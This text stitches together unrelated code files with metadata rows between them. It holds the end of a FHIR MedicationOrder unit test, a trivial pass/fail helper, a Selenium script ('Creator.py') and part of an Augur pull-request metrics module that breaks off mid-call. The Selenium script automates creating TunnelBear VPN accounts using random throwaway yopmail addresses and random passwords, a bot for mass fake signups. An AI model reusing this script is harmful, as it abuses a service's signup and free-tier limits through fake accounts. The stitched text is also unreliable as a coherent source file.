self.assertEqual(inst.dosageInstruction[0].text, "Paracetamol 3xdaags 1000mg")
self.assertEqual(inst.id, "f203")
self.assertEqual(inst.status, "active")
self.assertEqual(inst.text.status, "generated")
def testMedicationOrder6(self):
inst = self.instantiate_from(
"medicationorder-example-f202-flucloxacilline.json"
)
self.assertIsNotNone(inst, "Must have instantiated a MedicationOrder instance")
self.implMedicationOrder6(inst)
js = inst.as_json()
self.assertEqual("MedicationOrder", js["resourceType"])
inst2 = medicationorder.MedicationOrder(js)
self.implMedicationOrder6(inst2)
def implMedicationOrder6(self, inst):
self.assertEqual(inst.dateWritten.date, FHIRDate("2013-03-11").date)
self.assertEqual(inst.dateWritten.as_json(), "2013-03-11")
self.assertEqual(
inst.dosageInstruction[0].maxDosePerPeriod.denominator.code, "258702006"
)
self.assertEqual(
inst.dosageInstruction[0].maxDosePerPeriod.denominator.system,
"http://snomed.info/sct",
)
self.assertEqual(
inst.dosageInstruction[0].maxDosePerPeriod.denominator.unit, "hours"
)
self.assertEqual(
inst.dosageInstruction[0].maxDosePerPeriod.denominator.value, 24
)
self.assertEqual(
inst.dosageInstruction[0].maxDosePerPeriod.numerator.code, "258682000"
)
self.assertEqual(
inst.dosageInstruction[0].maxDosePerPeriod.numerator.system,
"http://snomed.info/sct",
)
self.assertEqual(
inst.dosageInstruction[0].maxDosePerPeriod.numerator.unit, "gram"
)
self.assertEqual(inst.dosageInstruction[0].maxDosePerPeriod.numerator.value, 12)
self.assertEqual(inst.dosageInstruction[0].method.coding[0].code, "323493005")
self.assertEqual(
inst.dosageInstruction[0].method.coding[0].display, "Injected floxacillin"
)
self.assertEqual(
inst.dosageInstruction[0].method.coding[0].system, "http://snomed.info/sct"
)
self.assertEqual(inst.dosageInstruction[0].route.coding[0].code, "47625008")
self.assertEqual(
inst.dosageInstruction[0].route.coding[0].display, "Intravenous route"
)
self.assertEqual(
inst.dosageInstruction[0].route.coding[0].system, "http://snomed.info/sct"
)
self.assertEqual(inst.dosageInstruction[0].text, "Flucloxacilline 12g/24h")
self.assertEqual(
inst.dosageInstruction[0].timing.repeat.boundsPeriod.end.date,
FHIRDate("2013-03-21").date,
)
self.assertEqual(
inst.dosageInstruction[0].timing.repeat.boundsPeriod.end.as_json(),
"2013-03-21",
)
self.assertEqual(
inst.dosageInstruction[0].timing.repeat.boundsPeriod.start.date,
FHIRDate("2013-03-11").date,
)
self.assertEqual(
inst.dosageInstruction[0].timing.repeat.boundsPeriod.start.as_json(),
"2013-03-11",
)
self.assertEqual(inst.id, "f202")
self.assertEqual(inst.status, "completed")
self.assertEqual(inst.text.status, "generated")
def testMedicationOrder7(self):
inst = self.instantiate_from("medicationorder-example-f002-crestor.json")
self.assertIsNotNone(inst, "Must have instantiated a MedicationOrder instance")
self.implMedicationOrder7(inst)
js = inst.as_json()
self.assertEqual("MedicationOrder", js["resourceType"])
inst2 = medicationorder.MedicationOrder(js)
self.implMedicationOrder7(inst2)
def implMedicationOrder7(self, inst):
self.assertEqual(inst.dateWritten.date, FHIRDate("2013-04-08").date)
self.assertEqual(inst.dateWritten.as_json(), "2013-04-08")
self.assertEqual(inst.dispenseRequest.quantity.code, "46992007")
self.assertEqual(inst.dispenseRequest.quantity.system, "http://snomed.info/sct")
self.assertEqual(inst.dispenseRequest.quantity.value, 90)
self.assertEqual(
inst.dispenseRequest.validityPeriod.start.date, FHIRDate("2013-04-08").date
)
self.assertEqual(
inst.dispenseRequest.validityPeriod.start.as_json(), "2013-04-08"
)
self.assertEqual(inst.dosageInstruction[0].doseQuantity.code, "mg")
self.assertEqual(
inst.dosageInstruction[0].doseQuantity.system, "http://unitsofmeasure.org"
)
self.assertEqual(inst.dosageInstruction[0].doseQuantity.unit, "mg")
self.assertEqual(inst.dosageInstruction[0].doseQuantity.value, 10)
self.assertEqual(inst.dosageInstruction[0].route.coding[0].code, "386359008")
self.assertEqual(
inst.dosageInstruction[0].route.coding[0].display,
"Administration of drug or medicament via oral route",
)
self.assertEqual(
inst.dosageInstruction[0].route.coding[0].system, "http://snomed.info/sct"
)
self.assertEqual(
inst.dosageInstruction[0].siteCodeableConcept.coding[0].code, "181220002"
)
self.assertEqual(
inst.dosageInstruction[0].siteCodeableConcept.coding[0].display,
"Entire oral cavity",
)
self.assertEqual(
inst.dosageInstruction[0].siteCodeableConcept.coding[0].system,
"http://snomed.info/sct",
)
self.assertEqual(
inst.dosageInstruction[0].timing.repeat.boundsPeriod.start.date,
FHIRDate("2013-08-04").date,
)
self.assertEqual(
inst.dosageInstruction[0].timing.repeat.boundsPeriod.start.as_json(),
"2013-08-04",
)
self.assertEqual(inst.dosageInstruction[0].timing.repeat.frequency, 1)
self.assertEqual(inst.dosageInstruction[0].timing.repeat.period, 1)
self.assertEqual(inst.dosageInstruction[0].timing.repeat.periodUnits, "d")
self.assertEqual(inst.id, "f002")
self.assertEqual(
inst.identifier[0].system, "http://www.bmc.nl/portal/prescriptions"
)
self.assertEqual(inst.identifier[0].use, "official")
self.assertEqual(inst.identifier[0].value, "order9837343")
self.assertEqual(inst.reasonCodeableConcept.coding[0].code, "28036006")
self.assertEqual(
inst.reasonCodeableConcept.coding[0].display,
"High density lipoprotein cholesterol level",
)
self.assertEqual(
inst.reasonCodeableConcept.coding[0].system, "http://snomed.info/sct"
)
self.assertEqual(inst.status, "active")
self.assertEqual(inst.text.status, "generated")
def testMedicationOrder8(self):
inst = self.instantiate_from("medicationorder-example-f003-tolbutamide.json")
self.assertIsNotNone(inst, "Must have instantiated a MedicationOrder instance")
self.implMedicationOrder8(inst)
js = inst.as_json()
self.assertEqual("MedicationOrder", js["resourceType"])
inst2 = medicationorder.MedicationOrder(js)
self.implMedicationOrder8(inst2)
def implMedicationOrder8(self, inst):
self.assertEqual(inst.dateWritten.date, FHIRDate("2011-05-01").date)
self.assertEqual(inst.dateWritten.as_json(), "2011-05-01")
self.assertEqual(inst.dispenseRequest.quantity.code, "46992007")
self.assertEqual(inst.dispenseRequest.quantity.system, "http://snomed.info/sct")
self.assertEqual(inst.dispenseRequest.quantity.value, 90)
self.assertEqual(
inst.dispenseRequest.validityPeriod.start.date, FHIRDate("2011-05-01").date
)
self.assertEqual(
inst.dispenseRequest.validityPeriod.start.as_json(), "2011-05-01"
)
self.assertEqual(inst.dosageInstruction[0].doseQuantity.code, "mg")
self.assertEqual(
inst.dosageInstruction[0].doseQuantity.system, "http://unitsofmeasure.org"
)
self.assertEqual(inst.dosageInstruction[0].doseQuantity.unit, "mg")
self.assertEqual(inst.dosageInstruction[0].doseQuantity.value, 500)
self.assertEqual(inst.dosageInstruction[0].route.coding[0].code, "386359008")
self.assertEqual(
inst.dosageInstruction[0].route.coding[0].display,
"Administration of drug or medicament via oral route",
)
self.assertEqual(
inst.dosageInstruction[0].route.coding[0].system, "http://snomed.info/sct"
)
self.assertEqual(
inst.dosageInstruction[0].siteCodeableConcept.coding[0].code, "181220002"
)
self.assertEqual(
inst.dosageInstruction[0].siteCodeableConcept.coding[0].display,
"Entire oral cavity",
)
self.assertEqual(
inst.dosageInstruction[0].siteCodeableConcept.coding[0].system,
"http://snomed.info/sct",
)
self.assertEqual(
inst.dosageInstruction[0].timing.repeat.boundsPeriod.start.date,
FHIRDate("2011-05-01").date,
)
self.assertEqual(
inst.dosageInstruction[0].timing.repeat.boundsPeriod.start.as_json(),
"2011-05-01",
)
self.assertEqual(inst.dosageInstruction[0].timing.repeat.frequency, 3)
self.assertEqual(inst.dosageInstruction[0].timing.repeat.period, 1)
self.assertEqual(inst.dosageInstruction[0].timing.repeat.periodUnits, "d")
self.assertEqual(inst.id, "f003")
self.assertEqual(
inst.identifier[0].system, "http://www.bmc.nl/portal/prescriptions"
)
self.assertEqual(inst.identifier[0].use, "official")
self.assertEqual(inst.identifier[0].value, "order9845343")
self.assertEqual(inst.reasonCodeableConcept.coding[0].code, "444780001")
self.assertEqual(
inst.reasonCodeableConcept.coding[0].display, "High glucose level in blood"
)
self.assertEqual(
inst.reasonCodeableConcept.coding[0].system, "http://snomed.info/sct"
)
self.assertEqual(inst.status, "active")
self.assertEqual(inst.text.status, "generated")
| 44.396923 | 88 | 0.647411 | 2,835 | 28,858 | 6.574956 | 0.093122 | 0.20118 | 0.245655 | 0.266524 | 0.892328 | 0.877414 | 0.863734 | 0.823981 | 0.788841 | 0.7478 | 0 | 0.051757 | 0.228048 | 28,858 | 649 | 89 | 44.465331 | 0.78498 | 0.003916 | 0 | 0.578862 | 1 | 0 | 0.138379 | 0.017571 | 0 | 0 | 0 | 0 | 0.419512 | 1 | 0.027642 | false | 0 | 0.009756 | 0 | 0.04065 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 11 |
fb620277e49e163e9b63b5f5428cc7bd230a8494 | 163 | py | Python | test/system/lib/test_result.py | mjlee34/poseidonos | 8eff75c5ba7af8090d3ff4ac51d7507b37571f9b | [
"BSD-3-Clause"
] | null | null | null | test/system/lib/test_result.py | mjlee34/poseidonos | 8eff75c5ba7af8090d3ff4ac51d7507b37571f9b | [
"BSD-3-Clause"
] | null | null | null | test/system/lib/test_result.py | mjlee34/poseidonos | 8eff75c5ba7af8090d3ff4ac51d7507b37571f9b | [
"BSD-3-Clause"
] | null | null | null | def expect_true(code):
if code == 0:
return "pass"
return "fail"
def expect_false(code):
if code != 0:
return "pass"
return "fail" | 18.111111 | 23 | 0.558282 | 22 | 163 | 4.045455 | 0.454545 | 0.202247 | 0.224719 | 0.247191 | 0.696629 | 0.696629 | 0.696629 | 0.696629 | 0 | 0 | 0 | 0.018018 | 0.319018 | 163 | 9 | 24 | 18.111111 | 0.783784 | 0 | 0 | 0.5 | 0 | 0 | 0.097561 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.25 | false | 0.25 | 0 | 0 | 0.75 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 8 |
fba62d2d56869ee698d26e1a057350217ada4bed | 4,427 | py | Python | Creator.py | Greycefulz/Selenium-Tunnel-Bear-Account-Creator | b1a330209bdfa7c4052a9aeda65f3deb71bdaf19 | [
"MIT"
] | 1 | 2021-09-26T00:52:43.000Z | 2021-09-26T00:52:43.000Z | Creator.py | Greycefulz/Selenium-Tunnel-Bear-Account-Creator | b1a330209bdfa7c4052a9aeda65f3deb71bdaf19 | [
"MIT"
] | null | null | null | Creator.py | Greycefulz/Selenium-Tunnel-Bear-Account-Creator | b1a330209bdfa7c4052a9aeda65f3deb71bdaf19 | [
"MIT"
] | null | null | null | from colorama import *
from selenium import webdriver
from selenium.common.exceptions import TimeoutException
from selenium.common.exceptions import NoSuchElementException
from selenium.webdriver.support.ui import WebDriverWait
from selenium.common.exceptions import WebDriverException
from selenium.webdriver.common.by import By
from selenium.webdriver.support import expected_conditions as EC
from selenium.webdriver.common.action_chains import ActionChains
from selenium.webdriver.common.keys import Keys
from time import sleep
import os
import random
options = webdriver.ChromeOptions()
driver = webdriver.Chrome(options=options, executable_path=r"chromedriver.exe")
actions = ActionChains(driver)
actions2 = ActionChains(driver)
actions3 = ActionChains(driver)
tunnel = "https://www.tunnelbear.com/account/login"
yopmail = "https://yopmail.com/en"
driver.get(tunnel)
driver.find_element_by_xpath("/html/body/div/div[1]/div[2]/div/section/div/div/div/div/div/div[3]/p/button").click()
email = random.choice("abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ13456789") + random.choice("abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ13456789") + random.choice("abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ13456789") + random.choice("abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ13456789") + random.choice("abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ13456789") + random.choice("abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ13456789") + random.choice("abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ13456789") + random.choice("abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ13456789") + random.choice("abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ13456789") + "@cool.fr.nf"
password = random.choice("abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ13456789!@#$%^&*()_+") + random.choice("abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ13456789!@#$%^&*()_+") +random.choice("abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ13456789!@#$%^&*()_+") +random.choice("abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ13456789!@#$%^&*()_+") +random.choice("abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ13456789!@#$%^&*()_+") +random.choice("abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ13456789!@#$%^&*()_+") +random.choice("abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ13456789!@#$%^&*()_+") +random.choice("abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ13456789!@#$%^&*()_+") +random.choice("abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ13456789!@#$%^&*()_+") +random.choice("abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ13456789!@#$%^&*()_+") +random.choice("abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ13456789!@#$%^&*()_+") +random.choice("abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ13456789!@#$%^&*()_+") +random.choice("abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ13456789!@#$%^&*()_+")
driver.find_element_by_xpath("/html/body/div/div[1]/div[2]/div/section/div/div/div/div/div/div[2]/div/form/div[1]/div[2]/input").click()
driver.find_element_by_xpath("/html/body/div/div[1]/div[2]/div/section/div/div/div/div/div/div[2]/div/form/div[1]/div[2]/input").send_keys(email)
driver.find_element_by_xpath("/html/body/div[1]/div[1]/div[2]/div/section/div/div/div/div/div/div[2]/div/form/div[2]/div[2]/input").click()
driver.find_element_by_xpath('/html/body/div[1]/div[1]/div[2]/div/section/div/div/div/div/div/div[2]/div/form/div[2]/div[2]/input').send_keys(password)
driver.find_element_by_xpath("/html/body/div[1]/div[1]/div[2]/div/section/div/div/div/div/div/div[2]/div/form/button/span").click()
created = f"""
╔═╗╔═╗╔═╗╔═╗╦ ╦╔╗╔╔╦╗ ╔═╗╦═╗╔═╗╔═╗╔╦╗╔═╗╔╦╗
╠═╣║ ║ ║ ║║ ║║║║ ║ ║ ╠╦╝║╣ ╠═╣ ║ ║╣ ║║
╩ ╩╚═╝╚═╝╚═╝╚═╝╝╚╝ ╩ ╚═╝╩╚═╚═╝╩ ╩ ╩ ╚═╝═╩╝\n
"""
email1 = email.split(':')[0]
driver.get(yopmail)
driver.find_element_by_xpath("/html/body/div/div[2]/main/div[3]/div/div[1]/div[2]/div/div/form/div/div[1]/div[2]/div/input").click()
driver.find_element_by_xpath("/html/body/div/div[2]/main/div[3]/div/div[1]/div[2]/div/div/form/div/div[1]/div[2]/div/input").send_keys(email1)
driver.find_element_by_xpath("/html/body/div/div[2]/main/div[3]/div/div[1]/div[2]/div/div/form/div/div[1]/div[4]/button/i").click()
os.system("cls")
print(created)
print(f"{email}:{password}\n")
print("Refresh Until You See The Verification Email :)\n\n\n\n\n")
# https://github.com/Greycefulz
| 72.57377 | 1,193 | 0.770499 | 500 | 4,427 | 6.938 | 0.212 | 0.077832 | 0.062266 | 0.449697 | 0.717786 | 0.683771 | 0.683771 | 0.683771 | 0.683771 | 0.683771 | 0 | 0.053824 | 0.043144 | 4,427 | 60 | 1,194 | 73.783333 | 0.740557 | 0.006551 | 0 | 0 | 0 | 0.209302 | 0.595086 | 0.5298 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0.069767 | 0.302326 | 0 | 0.302326 | 0.069767 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 7 |
fbb2723691843d145d449be24d7b3fbe9b6f086d | 22,805 | py | Python | augur/metrics/pull_request/pull_request.py | ritikavar/augur | eeb6013a4aa95641d4b47691e39a366e621b73cc | [
"MIT"
] | null | null | null | augur/metrics/pull_request/pull_request.py | ritikavar/augur | eeb6013a4aa95641d4b47691e39a366e621b73cc | [
"MIT"
] | null | null | null | augur/metrics/pull_request/pull_request.py | ritikavar/augur | eeb6013a4aa95641d4b47691e39a366e621b73cc | [
"MIT"
] | null | null | null | """
Metrics that provide data about pull requests & their associated activity
"""
import datetime
import sqlalchemy as s
import pandas as pd
from augur.util import annotate, add_metrics
@annotate(tag='pull-requests-merge-contributor-new')
def pull_requests_merge_contributor_new(self, repo_group_id, repo_id=None, period='day', begin_date=None, end_date=None):
"""
Returns a timeseries of the count of persons contributing with an accepted commit for the first time.
:param repo_id: The repository's id
:param repo_group_id: The repository's group id
:param period: To set the periodicity to 'day', 'week', 'month' or 'year', defaults to 'day'
:param begin_date: Specifies the begin date, defaults to '1970-1-1 00:00:00'
:param end_date: Specifies the end date, defaults to datetime.now()
:return: DataFrame of persons/period
"""
if not begin_date:
begin_date = '1970-1-1 00:00:01'
if not end_date:
end_date = datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S')
if repo_id:
commitNewContributor = s.sql.text("""
SELECT date_trunc(:period, new_date::DATE) as commit_date,
COUNT(cmt_author_email), repo_name
FROM ( SELECT repo_name, cmt_author_email, MIN(TO_TIMESTAMP(cmt_author_date,'YYYY-MM-DD')) AS new_date
FROM commits JOIN repo ON commits.repo_id = repo.repo_id
WHERE commits.repo_id = :repo_id
AND TO_TIMESTAMP(cmt_author_date,'YYYY-MM-DD') BETWEEN :begin_date AND :end_date AND cmt_author_email IS NOT NULL
GROUP BY cmt_author_email, repo_name
) as abc GROUP BY commit_date, repo_name
""")
results = pd.read_sql(commitNewContributor, self.database, params={'repo_id': repo_id, 'period': period,
'begin_date': begin_date,
'end_date': end_date})
else:
commitNewContributor = s.sql.text("""
SELECT abc.repo_id, repo_name ,date_trunc(:period, new_date::DATE) as commit_date,
COUNT(cmt_author_email)
FROM (SELECT cmt_author_email, MIN(TO_TIMESTAMP(cmt_author_date, 'YYYY-MM-DD')) AS new_date, repo_id
FROM commits
WHERE repo_id in (SELECT repo_id FROM repo WHERE repo_group_id = :repo_group_id)
AND TO_TIMESTAMP(cmt_author_date, 'YYYY-MM-DD') BETWEEN :begin_date AND :end_date
AND cmt_author_email IS NOT NULL
GROUP BY cmt_author_email, repo_id
) as abc, repo
WHERE abc.repo_id = repo.repo_id
GROUP BY abc.repo_id, repo_name, commit_date
""")
results = pd.read_sql(commitNewContributor, self.database,
params={'repo_group_id': repo_group_id, 'period': period,
'begin_date': begin_date,
'end_date': end_date})
return results
@annotate(tag='pull-requests-closed-no-merge')
def pull_requests_closed_no_merge(self, repo_group_id, repo_id=None, period='day', begin_date=None, end_date=None):
"""
Returns a timeseries of the which were closed but not merged
:param repo_id: The repository's id
:param repo_group_id: The repository's group id
:param period: To set the periodicity to 'day', 'week', 'month' or 'year', defaults to 'day'
:param begin_date: Specifies the begin date, defaults to '1970-1-1 00:00:00'
:param end_date: Specifies the end date, defaults to datetime.now()
:return: DataFrame of persons/period
"""
if not begin_date:
begin_date = '1970-1-1 00:00:01'
if not end_date:
end_date = datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S')
if repo_id:
closedNoMerge = s.sql.text("""
SELECT DATE_TRUNC(:period, pull_requests.pr_closed_at) AS closed_date,
COUNT(pull_request_id) as pr_count
FROM pull_requests JOIN repo ON pull_requests.repo_id = repo.repo_id
WHERE pull_requests.repo_id = :repo_id
AND pull_requests.pr_closed_at is NOT NULL AND
pull_requests.pr_merged_at is NULL
GROUP BY closed_date, pull_request_id
ORDER BY closed_date
""")
results = pd.read_sql(closedNoMerge, self.database, params={'repo_id': repo_id, 'period': period,
'begin_date': begin_date,
'end_date': end_date})
else:
closedNoMerge = s.sql.text("""
SELECT DATE_TRUNC(:period, pull_requests.pr_closed_at) AS closed_date,
COUNT(pull_request_id) as pr_count
FROM pull_requests JOIN repo ON pull_requests.repo_id = repo.repo_id WHERE pull_requests.repo_id in (SELECT repo_id FROM repo WHERE repo_group_id = :repo_group_id)
and pull_requests.pr_closed_at is NOT NULL and pull_requests.pr_merged_at is NULL
GROUP BY closed_date, pull_request_id
ORDER BY closed_date
""")
results = pd.read_sql(closedNoMerge, self.database,
params={'repo_group_id': repo_group_id, 'period': period,
'begin_date': begin_date,
'end_date': end_date})
return results
@annotate(tag='reviews')
def reviews(self, repo_group_id, repo_id=None, period='day', begin_date=None, end_date=None):
""" Returns a timeseris of new reviews or pull requests opened
:param repo_group_id: The repository's repo_group_id
:param repo_id: The repository's repo_id, defaults to None
:param period: To set the periodicity to 'day', 'week', 'month' or 'year', defaults to 'day'
:param begin_date: Specifies the begin date, defaults to '1970-1-1 00:00:00'
:param end_date: Specifies the end date, defaults to datetime.now()
:return: DataFrame of new reviews/period
"""
if not begin_date:
begin_date = '1970-1-1'
if not end_date:
end_date = datetime.datetime.now().strftime('%Y-%m-%d')
if not repo_id:
reviews_SQL = s.sql.text("""
SELECT
pull_requests.repo_id,
repo_name,
DATE_TRUNC(:period, pull_requests.pr_created_at) AS date,
COUNT(pr_src_id) AS pull_requests
FROM pull_requests JOIN repo ON pull_requests.repo_id = repo.repo_id
WHERE pull_requests.repo_id IN
(SELECT repo_id FROM repo WHERE repo_group_id = :repo_group_id)
AND pull_requests.pr_created_at
BETWEEN to_timestamp(:begin_date, 'YYYY-MM-DD')
AND to_timestamp(:end_date, 'YYYY-MM-DD')
GROUP BY pull_requests.repo_id, repo_name, date
ORDER BY pull_requests.repo_id, date
""")
results = pd.read_sql(reviews_SQL, self.database,
params={'period': period, 'repo_group_id': repo_group_id,
'begin_date': begin_date, 'end_date': end_date })
return results
else:
reviews_SQL = s.sql.text("""
SELECT
repo_name,
DATE_TRUNC(:period, pull_requests.pr_created_at) AS date,
COUNT(pr_src_id) AS pull_requests
FROM pull_requests JOIN repo ON pull_requests.repo_id = repo.repo_id
WHERE pull_requests.repo_id = :repo_id
AND pull_requests.pr_created_at
BETWEEN to_timestamp(:begin_date, 'YYYY-MM-DD HH24:MI:SS')
AND to_timestamp(:end_date, 'YYYY-MM-DD HH24:MI:SS')
GROUP BY date, repo_name
ORDER BY date
""")
results = pd.read_sql(reviews_SQL, self.database,
params={'period': period, 'repo_id': repo_id,
'begin_date': begin_date, 'end_date': end_date})
return results
@annotate(tag='reviews-accepted')
def reviews_accepted(self, repo_group_id, repo_id=None, period='day', begin_date=None, end_date=None):
"""Returns a timeseries of number of reviews or pull requests accepted.
:param repo_group_id: The repository's repo_group_id
:param repo_id: The repository's repo_id, defaults to None
:param period: To set the periodicity to 'day', 'week', 'month' or 'year', defaults to 'day'
:param begin_date: Specifies the begin date, defaults to '1970-1-1 00:00:00'
:param end_date: Specifies the end date, defaults to datetime.now()
:return: DataFrame of accepted reviews/period
"""
if not begin_date:
begin_date = '1970-1-1'
if not end_date:
end_date = datetime.datetime.now().strftime('%Y-%m-%d')
if not repo_id:
reviews_accepted_SQL = s.sql.text("""
SELECT
pull_requests.repo_id,
repo.repo_name,
DATE_TRUNC(:period, pull_requests.pr_merged_at) AS date,
COUNT(pr_src_id) AS pull_requests
FROM pull_requests JOIN repo ON pull_requests.repo_id = repo.repo_id
WHERE pull_requests.repo_id IN
(SELECT repo_id FROM repo WHERE repo_group_id = :repo_group_id)
AND pr_merged_at IS NOT NULL
AND pr_merged_at
BETWEEN to_timestamp(:begin_date, 'YYYY-MM-DD')
AND to_timestamp(:end_date, 'YYYY-MM-DD')
GROUP BY pull_requests.repo_id, repo_name, date
ORDER BY pull_requests.repo_id, date
""")
results = pd.read_sql(reviews_accepted_SQL, self.database,
params={'period': period, 'repo_group_id': repo_group_id,
'begin_date': begin_date, 'end_date': end_date})
return results
else:
reviews_accepted_SQL = s.sql.text("""
SELECT
repo.repo_name,
DATE_TRUNC(:period, pull_requests.pr_merged_at) AS date,
COUNT(pr_src_id) AS pull_requests
FROM pull_requests JOIN repo ON pull_requests.repo_id = repo.repo_id
WHERE pull_requests.repo_id = :repo_id
AND pr_merged_at IS NOT NULL
AND pr_merged_at
BETWEEN to_timestamp(:begin_date, 'YYYY-MM-DD')
AND to_timestamp(:end_date, 'YYYY-MM-DD')
GROUP BY date, repo.repo_name
ORDER BY date
""")
results = pd.read_sql(reviews_accepted_SQL, self.database,
params={'period': period, 'repo_id': repo_id,
'begin_date': begin_date, 'end_date': end_date})
return results
@annotate(tag='reviews-declined')
def reviews_declined(self, repo_group_id, repo_id=None, period='day', begin_date=None, end_date=None):
""" Returns a time series of reivews declined
:param repo_group_id: The repository's repo_group_id
:param repo_id: The repository's repo_id, defaults to None
:param period: To set the periodicity to 'day', 'week', 'month' or 'year', defaults to 'day'
:param begin_date: Specifies the begin date, defaults to '1970-1-1 00:00:00'
:param end_date: Specifies the end date, defaults to datetime.now()
:return: DataFrame of declined reviews/period
"""
if not begin_date:
begin_date = '1970-1-1'
if not end_date:
end_date = datetime.datetime.now().strftime('%Y-%m-%d')
if not repo_id:
reviews_declined_SQL = s.sql.text("""
SELECT
pull_requests.repo_id,
repo.repo_name,
DATE_TRUNC(:period, pull_requests.pr_closed_at) AS date,
COUNT(pr_src_id) AS pull_requests
FROM pull_requests JOIN repo ON pull_requests.repo_id = repo.repo_id
WHERE pull_requests.repo_id IN
(SELECT repo_id FROM repo WHERE repo_group_id = :repo_group_id)
AND pr_src_state = 'closed' AND pr_merged_at IS NULL
AND pr_closed_at
BETWEEN to_timestamp(:begin_date, 'YYYY-MM-DD')
AND to_timestamp(:end_date, 'YYYY-MM-DD')
GROUP BY pull_requests.repo_id, repo_name, date
ORDER BY pull_requests.repo_id, date
""")
results = pd.read_sql(reviews_declined_SQL, self.database,
params={'period': period, 'repo_group_id': repo_group_id,
'begin_date': begin_date, 'end_date': end_date })
return results
else:
reviews_declined_SQL = s.sql.text("""
SELECT
repo.repo_name,
DATE_TRUNC(:period, pull_requests.pr_closed_at) AS date,
COUNT(pr_src_id) AS pull_requests
FROM pull_requests JOIN repo ON pull_requests.repo_id = repo.repo_id
WHERE pull_requests.repo_id = :repo_id
AND pr_src_state = 'closed' AND pr_merged_at IS NULL
AND pr_closed_at
BETWEEN to_timestamp(:begin_date, 'YYYY-MM-DD')
AND to_timestamp(:end_date, 'YYYY-MM-DD')
GROUP BY date, repo.repo_name
ORDER BY date
""")
results = pd.read_sql(reviews_declined_SQL, self.database,
params={'period': period, 'repo_id': repo_id,
'begin_date': begin_date, 'end_date': end_date})
return results
@annotate(tag='review-duration')
def review_duration(self, repo_group_id, repo_id=None, begin_date=None, end_date=None):
""" Returns the duration of each accepted review.
:param repo_group_id: The repository's repo_group_id
:param repo_id: The repository's repo_id, defaults to None
:param begin_date: Specifies the begin date, defaults to '1970-1-1 00:00:00'
:param end_date: Specifies the end date, defaults to datetime.now()
:return: DataFrame of pull request id with the corresponding duration
"""
if not begin_date:
begin_date = '1970-1-1'
if not end_date:
end_date = datetime.datetime.now().strftime('%Y-%m-%d')
if not repo_id:
review_duration_SQL = s.sql.text("""
SELECT
pull_requests.repo_id,
repo.repo_name,
pull_requests.pull_request_id,
pull_requests.pr_created_at AS created_at,
pull_requests.pr_merged_at AS merged_at,
(pr_merged_at - pr_created_at) AS duration
FROM pull_requests JOIN repo ON pull_requests.repo_id = repo.repo_id
WHERE pull_requests.repo_id IN
(SELECT repo_id FROM repo WHERE repo_group_id = :repo_group_id)
AND pr_merged_at IS NOT NULL
AND pr_created_at
BETWEEN to_timestamp(:begin_date, 'YYYY-MM-DD')
AND to_timestamp(:end_date, 'YYYY-MM-DD')
ORDER BY pull_requests.repo_id, pull_requests.pull_request_id
""")
results = pd.read_sql(review_duration_SQL, self.database,
params={'repo_group_id': repo_group_id,
'begin_date': begin_date,
'end_date': end_date})
results['duration'] = results['duration'].astype(str)
return results
else:
review_duration_SQL = s.sql.text("""
SELECT
repo_name,
pull_request_id,
pr_created_at AS created_at,
pr_merged_at AS merged_at,
(pr_merged_at - pr_created_at) AS duration
FROM pull_requests JOIN repo ON pull_requests.repo_id = repo.repo_id
WHERE pull_requests.repo_id = :repo_id
AND pr_merged_at IS NOT NULL
AND pr_created_at
BETWEEN to_timestamp(:begin_date, 'YYYY-MM-DD')
AND to_timestamp(:end_date, 'YYYY-MM-DD')
ORDER BY pull_requests.repo_id, pull_request_id
""")
results = pd.read_sql(review_duration_SQL, self.database,
params={'repo_id': repo_id,
'begin_date': begin_date,
